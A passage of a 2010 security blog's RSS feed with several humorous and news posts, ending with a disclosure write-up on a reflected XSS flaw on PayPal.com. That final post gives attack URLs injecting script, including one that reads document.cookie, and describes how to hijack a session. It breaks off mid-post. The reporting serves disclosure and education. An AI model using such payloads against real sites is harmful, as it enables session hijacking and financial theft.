<p>From personal experience, students are certainly sending and posting information that their parents and other adults would note is probably a mistake to preserve electronically and share. Campaigns, such as the James Lipton campaign we posted about earlier, <a href="http://praetorianprefect.com/archives/2009/12/james-lipton-says-dont-tweet-your-junk/">Don&#8217;t Tweet Your Junk</a>, are largely a reaction to this problem.</p>

<p>So there is an issue here that should not be ignored, one that naturally followed the increasing capabilities of cell phones, the decreasing costs, and the result that more young people than ever have sophisticated access to communications technology (something their parents did not by and large have). That said, hyping the numbers by suggesting that 2 out of every 10 teens are sending naked pictures of themselves via their phones is unnecessarily alarmist.</p>

<p>The other, larger problem of overreaction is overzealous prosecution of teenagers under child pornography laws which were certainly not codified to cover teenagers e-mailing photographs to each other. Further, the classification of said teenagers or young adults as sex offenders serves only to weaken the notification requirements under Megan&#8217;s Law, designed to protect youth against real sex predators.</p>

<h3>Finally</h3>

<p>I don&#8217;t understand the proclivity in the number of people sending naked pictures of their junk to other people. Maybe if doing so will result in Paris Hilton-like publicity, but for most of us photographing our nether regions should be grounds for having our heads examined. That said, what we have here is two consenting adults sending content between each other. It was no more the high school&#8217;s business than it was that of the mother, unless a school computer was used.</p>

<p>One could make the loose case that the mother of a 20-year-old might have the moral authority to snoop to try to keep her daughter safe (we don&#8217;t really think so at 20, but we could see someone saying that). But sending the pictures on to the high school administration rather than handling this as a private family matter shows terrible judgment on the mother&#8217;s part. Parents can&#8217;t be controlled, though; the school had to realize a story as salacious as this would spawn media coverage, and should have had its act in order before reacting. If they have nothing, no evidence that this relationship started when the girl was underage or in high school, no use of a school computer established via evidence gathered in a forensically sound manner, then this school board has made a mistake.</p>

<p>Or as Principal Richardson defined the school&#8217;s mission: &#8220;They&#8217;re teaching our students how to become good characters&#8221;. They&#8217;re acting like characters all right, so far anyway.</p>

<h3>Sources:</h3>

<ul>
<li><a href="http://outofbounds.nbcsports.com/2010/05/coach-fired-for-cell-pics.html.php">High school coach fired for sexting 20-year-old college girlfriend. Wait, what?</a></li>
<li><a href="http://www.news4jax.com/news/23651635/detail.html">Mandarin Football Coach Under Fire</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/james-lipton-says-dont-tweet-your-junk/">James Lipton says &#8220;Don&#8217;t tweet your junk&#8221;</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/05/thou-shalt-not-send-naked-pictures-to-anyone-ever/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>For Access Call, or Walk Right In</title>
		<link>http://praetorianprefect.com/archives/2010/05/for-access-call-or-walk-right-in/</link>
		<comments>http://praetorianprefect.com/archives/2010/05/for-access-call-or-walk-right-in/#comments</comments>
		<pubDate>Fri, 21 May 2010 20:21:17 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[funny]]></category>
		<category><![CDATA[airport]]></category>
		<category><![CDATA[machine room]]></category>
		<category><![CDATA[Physical Security]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3873</guid>
		<description><![CDATA[Presumably the door sign should read "For Access Call...or Just Walk In".]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/600px-Do_Not_Enter_sign.svg_.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/600px-Do_Not_Enter_sign.svg_-150x150.png" alt="" title="600px-Do_Not_Enter_sign.svg" width="150" height="150" class="alignleft size-thumbnail wp-image-3874" /></a></p>

<p>Courtesy of security rock star Rik Ferguson comes the below picture of a data room (server room) at the airport in Johannesburg (O.R. Tambo International Airport). Presumably the door sign should read &#8220;For Access Call&#8230;or Just Walk In&#8221;.</p>

<p>On a more serious note, in this age of discomfort surrounding airport security, why does Africa&#8217;s largest airport have a door sign viewable from a public area that clearly labels where to find sensitive equipment? Wait, why is the data room accessible from a public area at all? These are questions for airport officials, I guess.</p>

<p>They have been notified.</p>

<p><div id="attachment_3875" class="wp-caption aligncenter" style="width: 490px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/103737894.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/103737894.jpg" alt="Open Door at the Data Room in the airport at Johannesburg, South Africa" title="103737894" width="480" height="640" class="size-full wp-image-3875" /></a><p class="wp-caption-text">Open Door at the Data Room in the airport at Johannesburg, South Africa.</p></div>
<br /></p>

<p>Remember: self closing doors, man traps, &#8220;keep door closed&#8221; signs, and caning server administrators who leave doors open are effective deterrents for this kind of behavior.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/05/happy-30th-birthday-pac-man-google-style/">Happy 30th Birthday Pac-Man, Google Style</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/best-information-security-commercial-evah/">Best Information Security Commercial Evah&#8230;</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/04/bo-dietl-lost-his-guns/">Bo Dietl Lost His Guns</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/05/for-access-call-or-walk-right-in/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Happy 30th Birthday Pac-Man, Google Style</title>
		<link>http://praetorianprefect.com/archives/2010/05/happy-30th-birthday-pac-man-google-style/</link>
		<comments>http://praetorianprefect.com/archives/2010/05/happy-30th-birthday-pac-man-google-style/#comments</comments>
		<pubDate>Fri, 21 May 2010 17:59:25 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[funny]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[video games]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3829</guid>
		<description><![CDATA[Hat's off to Google for unveiling perhaps the greatest tribute today to the 30th anniversary of the iconic video game Pac-Man.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/pacman.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/pacman.jpg" alt="" title="pacman" width="75" height="75" class="alignleft size-full wp-image-3830" /></a>
<br /></p>

<p>Hats off <a href="http://googleblog.blogspot.com/2010/05/celebrating-pac-mans-30th-birthday.html">to Google</a> for unveiling perhaps the greatest tribute today to the 30th anniversary of the iconic video game Pac-Man. Google revealed its first &#8220;doodle&#8221; or temporary logo change back in 1998, with the first animated logo appearing on Newton&#8217;s birthday earlier this year. At this rate of increasing complexity, the Google logo should be sentient by 2012.</p>

<p>For the birthday of one of the most successful video games of all time, Google reveals perhaps its most complex logo of all time: a full-featured playable version of the game for the next 48 hours:</p>

<p><div id="attachment_3835" class="wp-caption alignnone" style="width: 564px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/pacman10-hp.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/pacman10-hp.png" alt="Go to google.com, and click the logo or the Insert Coin button." title="pacman10-hp" width="554" height="186" class="size-full wp-image-3835" /></a><p class="wp-caption-text">Go to google.com, and click the logo or the Insert Coin button.</p></div>
<br /></p>

<p>Hit &#8220;Insert Coin&#8221; twice and Mrs. Pac-Man will show up too.</p>

<h3>Pac-Man</h3>

<p><div id="attachment_3832" class="wp-caption alignright" style="width: 250px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/amd_pacman.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/amd_pacman.jpg" alt="The original 1980 Pac-Man." title="Krazy! Exhibition" width="240" height="338" class="size-full wp-image-3832" /></a><p class="wp-caption-text">The original 1980 version of Pac-Man.</p></div>
<br /></p>

<p>Pac-Man was first released on May 22nd, 1980, thirty years ago today, by Namco in Japan. According to Guinness, Pac-Man is the most successful coin-operated video game of all time. It sold more than 100,000 units in 1980, and kids pumped more than $1 billion in quarters into the arcade game in its first fifteen months. It was played more than 10 billion times in the first twenty years after its release.</p>

<h3>End Game</h3>

<p><div id="attachment_3833" class="wp-caption alignleft" style="width: 234px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/Split_Screen_in_Pac_Man.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/Split_Screen_in_Pac_Man.gif" alt="At level 256, things get messy." title="Split_Screen_in_Pac_Man" width="224" height="288" class="size-full wp-image-3833" /></a><p class="wp-caption-text">At level 256, things get messy.</p></div>
<br /></p>

<p>Due to a programming glitch the game ends at level 256, although that&#8217;s not much of an issue because few in history have ever gotten a perfect score. Billy Mitchell played the first verified perfect game in 1999. In 2009 David Race became the sixth and currently last person known to achieve a perfect score.</p>

<p>Notice we said &#8216;verified perfect game&#8217;? That&#8217;s because in 1982 an 8-year-old named Jeffrey Yee allegedly received a congratulatory letter from then President Ronald Reagan congratulating him for the record score of 6,131,940 points. There&#8217;s a problem though: that score would only be possible by passing level 256, the famous impassable split-screen bug shown at left.</p>

<h3>Pizza &amp; Puck-Man</h3>

<p>Toru Iwatani was the primary developer of the game in 1979, and has related the apocryphal story that the main character was designed after looking at a pizza that was missing a slice. In reality the character is a rounding and simplification of the Japanese character for kuchi, or mouth. The original name, pronounced pakku-man, is a take off of the Japanese phrase paku-paku taberu where the words paku-paku describe the sound of a mouth eating.</p>

<p>The game was released under the name Puck-Man, but modified for the game&#8217;s North American release to Pac-Man as it was feared that arcade machines would be vandalized by modifying the &#8216;P&#8217; to an &#8216;F&#8217;.</p>

<h3>Those Ghosts</h3>

<p><i>&#8220;Google doodler Ryan Germick and I made sure to include Pac-Man&#8217;s original game logic, graphics and sounds, bring back ghosts&#8217; individual personalities, and even recreate original bugs from this 1980&#8217;s masterpiece,&#8221;</i> <br />- Marcin Wichary, Usability, Google</p>

<p><div id="attachment_3856" class="wp-caption alignleft" style="width: 234px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/Pacman_origghosts.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/Pacman_origghosts.png" alt="" title="Pacman_origghosts" width="224" height="288" class="size-full wp-image-3856" /></a><p class="wp-caption-text">Original Monster Names.</p></div>
<br /></p>

<p>Blinky, Pinky, Inky, and Clyde are the four ghost monsters, the antagonists of the game. Each has its own personality derived from movement patterns, as derivable from both past efforts to reverse engineer the game as well as the Japanese translations of their original names:</p>

<table>
<thead>
<tr>
  <th>Name:</th>
  <th>Color:</th>
  <th>Translation:</th>
</tr>
</thead>
<tbody>
<tr>
  <td>Blinky</td>
  <td>Red</td>
  <td>Chaser</td>
</tr>
<tr>
  <td>Pinky</td>
  <td>Pink</td>
  <td>Ambusher</td>
</tr>
<tr>
  <td>Inky</td>
  <td>Cyan</td>
  <td>Fickle</td>
</tr>
<tr>
  <td>Clyde</td>
  <td>Orange</td>
  <td>Stupid</td>
</tr>
</tbody>
</table>

<h3>Finally</h3>

<p>You can go play Pac-Man a few blocks from Praetorian&#8217;s main office down at the Chinatown Fair Video Arcade on Mott Street.</p>

<p>With that we leave you with the 80&#8217;s tribute song <a href="http://www.youtube.com/watch?v=0-MONIvP6kI">Pac-Man Fever</a> by Buckner and Garcia in honor of the day. Enjoy.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/05/for-access-call-or-walk-right-in/">For Access Call, or Walk Right In</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/best-information-security-commercial-evah/">Best Information Security Commercial Evah&#8230;</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/04/bo-dietl-lost-his-guns/">Bo Dietl Lost His Guns</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/05/happy-30th-birthday-pac-man-google-style/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Best Information Security Commercial Evah&#8230;</title>
		<link>http://praetorianprefect.com/archives/2010/05/best-information-security-commercial-evah/</link>
		<comments>http://praetorianprefect.com/archives/2010/05/best-information-security-commercial-evah/#comments</comments>
		<pubDate>Fri, 14 May 2010 21:14:27 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[funny]]></category>
		<category><![CDATA[charlatans]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3886</guid>
		<description><![CDATA[

Say what you will about LIGATT Security, the publicly traded (around 0.0004) Georgia company headed by self-styled security expert and convicted felon (federal conspiracy and wire fraud) Gregory Evans: they are responsible for what might be the greatest information security commercial ever created.

As you can see, the protagonist is down on his luck, but [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/05/snake-oil-clip1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/05/snake-oil-clip1-150x150.jpg" alt="" title="snake-oil-clip1" width="75" height="75" class="alignleft size-thumbnail wp-image-3890" /></a></p>

<p>Say what you will about LIGATT Security, the publicly traded (around 0.0004) Georgia company headed by self-styled security expert and convicted felon (federal conspiracy and wire fraud) Gregory Evans: they are responsible for what might be the greatest information security commercial ever created.</p>

<p>As you can see, the protagonist is down on his luck, but he has a plan to change that. It starts by sitting outside your house with a laptop while you sleep, and attacking your wireless&#8230;well, just watch:
<br /></p>

<p><object width="480" height="385"><param name="movie" value="http://www.youtube.com/v/Wy9LELlwbZs&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/Wy9LELlwbZs&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object>
<br /></p>

<p>At one point it&#8217;s unclear whether he&#8217;s going to crack a WEP key or someone&#8217;s head with the way he&#8217;s holding that laptop.</p>

<p>And where did that laptop come from in the driveway anyway?</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/05/for-access-call-or-walk-right-in/">For Access Call, or Walk Right In</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/happy-30th-birthday-pac-man-google-style/">Happy 30th Birthday Pac-Man, Google Style</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/04/bo-dietl-lost-his-guns/">Bo Dietl Lost His Guns</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/05/best-information-security-commercial-evah/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Bo Dietl Lost His Guns</title>
		<link>http://praetorianprefect.com/archives/2010/04/bo-dietl-lost-his-guns/</link>
		<comments>http://praetorianprefect.com/archives/2010/04/bo-dietl-lost-his-guns/#comments</comments>
		<pubDate>Fri, 16 Apr 2010 21:57:48 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[funny]]></category>
		<category><![CDATA[charlatans]]></category>
		<category><![CDATA[Physical Security]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3737</guid>
<description><![CDATA[<a href="http://en.wikipedia.org/wiki/Bo_Dietl">Richard "Bo" Dietl</a> lost his guns. The former NYPD Detective and media contributor on Fox News and the Don Imus show, founder of <a href="http://www.investigations.com/">Beau Dietl &#38; Associates</a>, subject of a film where he was played by Stephen Baldwin, and Chairman of the New York State Security Guard Advisory Council was featured on Jon Stewart's show for being himself burglarized. What's funny is that his description of what happened, particularly his focus on the security measures he had in place but that weren't used, follows the well-worn pattern of responses one typically hears after an information security breach (but we were PCI compliant, we had IDS in place, it was a sophisticated attacker, everyone gets hacked, and so forth).]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/04/fbn-20091123-dietlmmfa.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/04/fbn-20091123-dietlmmfa-150x150.jpg" alt="fbn-20091123-dietlmmfa" title="fbn-20091123-dietlmmfa" width="110" height="110" class="alignleft size-thumbnail wp-image-3741" /></a></p>

<p><a href="http://en.wikipedia.org/wiki/Bo_Dietl">Richard &#8220;Bo&#8221; Dietl</a> lost his guns. The former NYPD Detective and media contributor on Fox News and the Don Imus show, founder of <a href="http://www.investigations.com/">Beau Dietl &amp; Associates</a>, subject of a film where he was played by Stephen Baldwin, and Chairman of the New York State Security Guard Advisory Council was featured on Jon Stewart&#8217;s show for being himself burglarized. What&#8217;s funny is that his description of what happened, particularly his focus on the security measures he had in place but that weren&#8217;t used, follows the well-worn pattern of responses one typically hears after an information security breach (but we were PCI compliant, we had IDS in place, it was a sophisticated attacker, everyone gets hacked, and so forth).</p>

<h3>Back Story</h3>

<p>Bo Dietl had his guns (9 handguns and a shotgun) stolen from his 1 Penn Plaza office sometime between November 2007 and last January, according to his time frame. He spends time in the clip showing us his office&#8217;s four-hour safe (fire protection is rated in hours), the safe the guns were next to, not in. The shotgun was on top of a bookshelf.</p>

<h3>The Daily Show, 04/15/2010</h3>

<table style='font:11px arial; color:#333; background-color:#f5f5f5' cellpadding='0' cellspacing='0' width='360' height='353'><tbody><tr style='background-color:#e5e5e5' valign='middle'><td style='padding:2px 1px 0px 5px;'><a target='_blank' style='color:#333; text-decoration:none; font-weight:bold;' href='http://www.thedailyshow.com'>The Daily Show With Jon Stewart</a></td><td style='padding:2px 5px 0px 5px; text-align:right; font-weight:bold;'>Mon &#8211; Thurs 11p / 10c</td></tr><tr style='height:14px;' valign='middle'><td style='padding:2px 1px 0px 5px;' colspan='2'><a target='_blank' style='color:#333; text-decoration:none; font-weight:bold;' href='http://www.thedailyshow.com/watch/thu-april-15-2010/he-s-come-ungunned'>He&#8217;s Come Ungunned</a></td></tr><tr style='height:14px; background-color:#353535' valign='middle'><td colspan='2' style='padding:2px 5px 0px 5px; width:360px; overflow:hidden; text-align:right'><a target='_blank' style='color:#96deff; text-decoration:none; font-weight:bold;' href='http://www.thedailyshow.com/'>www.thedailyshow.com</a></td></tr><tr valign='middle'><td style='padding:0px;' colspan='2'><embed style='display:block' src='http://media.mtvnservices.com/mgid:cms:item:comedycentral.com:270695' width='360' height='301' type='application/x-shockwave-flash' wmode='window' allowFullscreen='true' flashvars='autoPlay=false' allowscriptaccess='always' allownetworking='all' bgcolor='#000000'></embed></td></tr><tr style='height:18px;' valign='middle'><td style='padding:0px;' colspan='2'><table style='margin:0px; text-align:center' cellpadding='0' cellspacing='0' width='100%' height='100%'><tr valign='middle'><td style='padding:3px; width:33%;'><a target='_blank' style='font:10px arial; color:#333; text-decoration:none;' href='http://www.thedailyshow.com/full-episodes/'>Daily Show Full Episodes</a></td><td style='padding:3px; width:33%;'><a target='_blank' style='font:10px arial; color:#333; text-decoration:none;' href='http://www.indecisionforever.com'>Political Humor</a></td><td style='padding:3px; width:33%;'><a target='_blank' style='font:10px arial; color:#333; text-decoration:none;' href='http://www.thedailyshow.com/videos/tag/Tea+Party'>Tea Party</a></td></tr></table></td></tr></tbody></table>

<h3>Beau Dietl &amp; Associates</h3>

<p>The firm primarily handles personnel and physical security, and has a list of firms, events, and celebrities for which they have provided personal protection.</p>

<p>Unfortunately when Bo starts advising on information security, the wheels fall off the wagon:</p>

<p><embed type='application/x-shockwave-flash' src='http://foxnews1.a.mms.mavenapps.net/mms/rt/1/site/foxnews1-foxnews-pub01-live/current/videolandingpage/fncLargePlayer/client/embedded/embedded.swf' id='mediumFlashEmbedded' pluginspage='http://www.macromedia.com/go/getflashplayer' bgcolor='#000000' allowScriptAccess='always' allowFullScreen='true' quality='high' name='FOX News' play='false' scale='noscale' menu='false' salign='LT' scriptAccess='always' wmode='false' height='275' width='305' flashvars='playerId=videolandingpage&#038;playerTemplateId=fncLargePlayer&#038;categoryTitle=undefined&#038;referralObject=3099919' /></p>

<h3>Finally</h3>

<p>A laugh on a Friday along with two important lessons: the best security measures don&#8217;t work when they&#8217;re not actually used, and practice what you preach.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/05/for-access-call-or-walk-right-in/">For Access Call, or Walk Right In</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/happy-30th-birthday-pac-man-google-style/">Happy 30th Birthday Pac-Man, Google Style</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/best-information-security-commercial-evah/">Best Information Security Commercial Evah&#8230;</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/04/bo-dietl-lost-his-guns/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Give this Man a Haircut and Support a Worthwhile Cause</title>
		<link>http://praetorianprefect.com/archives/2010/04/give-this-man-a-haircut-and-support-a-worthwhile-cause/</link>
		<comments>http://praetorianprefect.com/archives/2010/04/give-this-man-a-haircut-and-support-a-worthwhile-cause/#comments</comments>
		<pubDate>Fri, 16 Apr 2010 19:52:43 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Technology in Society]]></category>
		<category><![CDATA[google hacking]]></category>
		<category><![CDATA[johnny long]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3725</guid>
		<description><![CDATA[Gal Shpantzer, friend of the blog, fellow blogger, and <a href="http://blogs.csoonline.com/blog/gal_shpantzer">a writer for CSO Online</a> asked us to bring some attention to a <a href="http://blogs.csoonline.com/1194/i_dare_you_to_make_me_get_a_mohawk_its_for_a_good_cause_really">worthy cause</a>. As part of his talk at Security B-Sides Boston in Cambridge, MA, he will partake in certain unabashed activities for each monetary contribution threshold reached for Hackers for Charity.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/04/shpantzer_mohawk1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/04/shpantzer_mohawk1.jpg" alt="shpantzer_mohawk" title="shpantzer_mohawk" width="69" height="85" class="alignleft size-full wp-image-3748" /></a></p>

<p>Gal Shpantzer, friend of the blog, fellow blogger, and <a href="http://blogs.csoonline.com/blog/gal_shpantzer">a writer for CSO Online</a> asked us to bring some attention to a <a href="http://blogs.csoonline.com/1194/i_dare_you_to_make_me_get_a_mohawk_its_for_a_good_cause_really">worthy cause</a>. As part of his talk at Security B-Sides Boston in Cambridge, MA, he will partake in certain unabashed activities for each monetary contribution threshold reached for Hackers for Charity.</p>

<p>If the total amount of money raised is $3,000 or more, he will shave his head into a Mohawk.</p>

<p>At the $5,000 level, he says he will wear a kilt. For this second one, we&#8217;re not sure how doing something he likes to do anyway is a personal challenge, but whatever.</p>

<h3>The Specifics</h3>

<p>To donate via PayPal, start at the following address: <a href="http://www.hackersforcharity.org/hackers-for-charity/get-involved/#Long_Journey">http://www.hackersforcharity.org/hackers-for-charity/get-involved/#Long_Journey</a>.</p>

<p>When you receive a receipt from PayPal for the donation amount, please e-mail the relevant portions to: <u>mohawk@security-twits.com</u>. If the above thresholds are reached by April 24th, Gal Shpantzer will really need that hat he&#8217;s always pictured in wherever he goes.</p>

<h3>About Hackers for Charity</h3>

<p>Hackers for Charity is a non-profit organization created by Johnny Long. The overall goals of Hackers for Charity <a href="http://www.hackersforcharity.org">are listed</a> as follows:</p>

<ul>
<li>We feed children through our &#8220;food for work&#8221; program.</li>
<li>We build computer labs to help students learn skills and land jobs that are key to disrupting poverty&#8217;s vicious cycle.</li>
<li>We provide technical assistance to charities that cannot afford IT services.</li>
</ul>

<div id="attachment_3733" class="wp-caption alignleft" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/04/IMG_4245-300x225.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/04/IMG_4245-300x225.jpg" alt="The Jinja, Uganda community center." title="IMG_4245-300x225" width="300" height="225" class="size-full wp-image-3733" /></a><p class="wp-caption-text">The Jinja, Uganda community center.</p></div>

<p>A center was recently opened under the initiative in Jinja, Uganda in East Africa. The goal of the center is to provide hands on computer training to a community that will soon reap the benefits of high speed fiber lines such as the ones running from Mombasa. In order to realize job creation in these areas, people who have never before touched a computer require hands on experience, experience that can be gained using the free training resources and heavily discounted computer usage fees available at the new center.</p>

<p>You can read the rest of what is an interesting progression, see which firms have supported the training initiative, and even read the story of one condescending company that wouldn&#8217;t help <a href="http://www.hackersforcharity.org/community-centers/">here</a>.</p>

<h3>Johnny Long</h3>

<p>Johnny Long is a security researcher best known for popularizing Google hacking, using search phrases in the popular search engine to identify vulnerable services on the Internet and for being as he&#8217;s described it, a &#8220;Christian hacker&#8221;. He&#8217;s published a book on the Google hacking techniques, and contributed to more than ten other works in information security literature.</p>

<h3>Finally</h3>

<p>We at Praetorian also think Gal should dye the mohawk one color and the rest of his hair another.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/zuckerburg-apologizes-for-facebook-privacy-changes/">Zuckerburg Apologizes for Facebook Privacy Changes</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/james-lipton-says-dont-tweet-your-junk/">James Lipton says &#8220;Don&#8217;t tweet your junk&#8221;</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/lojack-for-children/">LoJack for children</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/yahoo-and-the-objectification-of-women/">Yahoo! and the Objectification of Women</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/04/give-this-man-a-haircut-and-support-a-worthwhile-cause/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>XSS Flaw on PayPal.com</title>
		<link>http://praetorianprefect.com/archives/2010/03/xss-flaw-on-paypal-com/</link>
		<comments>http://praetorianprefect.com/archives/2010/03/xss-flaw-on-paypal-com/#comments</comments>
		<pubDate>Fri, 26 Mar 2010 22:13:42 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Cross Site Scripting]]></category>
		<category><![CDATA[pci]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3582</guid>
		<description><![CDATA[Earlier today Wesley Kerfoot reported on the Full Disclosure mailing list that a page in the Paypal.com domain is susceptible to a non-persistent reflected cross site scripting attack (XSS). While non-persistent XSS bugs are somewhat common, this is quite serious for a site like PayPal, where user accounts are linked directly to bank accounts, debit, or credit cards and payment can be made to third parties without any additional authentication after user access is gained.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/paypal_logo.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/paypal_logo.jpg" alt="paypal_logo" title="paypal_logo" width="119" height="119" class="alignleft size-full wp-image-3584" /></a></p>

<p>Earlier today Wesley Kerfoot reported on the Full Disclosure mailing list that a page in the Paypal.com domain is susceptible to a non-persistent reflected cross site scripting attack (XSS). While non-persistent XSS bugs are somewhat common, this is quite serious for a site like PayPal, where user accounts are linked directly to bank accounts, debit, or credit cards and payment can be made to third parties without any additional authentication after user access is gained.</p>

<p><i>Update: As of 7pm EST, it appears that a mitigation has been implemented for this vulnerability on the PayPal web site where all requests to /xclick/business redirect to the PayPal homepage.</i></p>

<p>An attacker able to trick a user with a valid PayPal session into clicking a crafted version of the link below (it wouldn&#8217;t be hard; think of a link in an eBay auction listing or in a phishing e-mail) could hijack the user&#8217;s session and initiate financial transactions on their behalf, including money transfers. Alternatively this legitimate URL could be used to redirect the user to a spoofed PayPal web site designed to steal credentials, a fairly common scam that is more effective here because the user sees a genuine PayPal URL to click on.</p>

<h3>Attack String</h3>

<p>The following string is provided as example in the Full Disclosure posting:</p>

<pre><code>https://www.paypal.com/xclick/business=&lt;script&gt; alert("xss"); &lt;/script&gt;
</code></pre>

<p>Which in turn results in this:</p>

<p><div id="attachment_3586" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/paypal_xss.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/paypal_xss.jpg" alt="Javascript injected as part of a name-value pair is reflected on the resulting web page." title="paypal_xss" width="750" height="780" class="size-full wp-image-3586" /></a><p class="wp-caption-text">Javascript injected as part of a name-value pair is reflected on the resulting web page.</p></div>
<br /></p>

<p>Of course where this works, this will just as easily work:</p>

<pre><code>https://www.paypal.com/xclick/business=&lt;script&gt; alert(document.cookie); &lt;/script&gt;
</code></pre>

<p>Which dutifully reflects back wrapped in a header tag on the resulting page:</p>

<pre><code>&lt;div class="legacyErrors " id="page"&gt;
&lt;div id="header"&gt;&lt;h1&gt;&lt;script&gt; alert(document.cookie); &lt;/script&gt;&lt;/h1&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;div id="content"&gt;
&lt;div id="headline"&gt;
</code></pre>

<p>And finally which displays the user&#8217;s logged in session information:</p>

<p><div id="attachment_3587" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/paypal_cookie.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/paypal_cookie.jpg" alt="The result of injecting alert(document.cookie) into the same page for a logged in PayPal user." title="paypal_cookie" width="750" height="101" class="size-full wp-image-3587" /></a><p class="wp-caption-text">The result of injecting alert(document.cookie) into the same page for a logged in PayPal user.</p></div>
<br /></p>

<p>Rather than displaying the cookies, an attacker would send them to a web site he controls, set them locally as his own session, and begin initiating transactions on behalf of the user. That is only one example: because the JavaScript executes in the context of the PayPal web site, the attacker can script just about any action a logged-in user could take, whether through JavaScript, Flash, or anything else the site exposes. Site redirects, iframe injection, and further injection flaws are all possible on a web page that does not validate untrusted input.</p>

<h3>XSS at a High Level</h3>

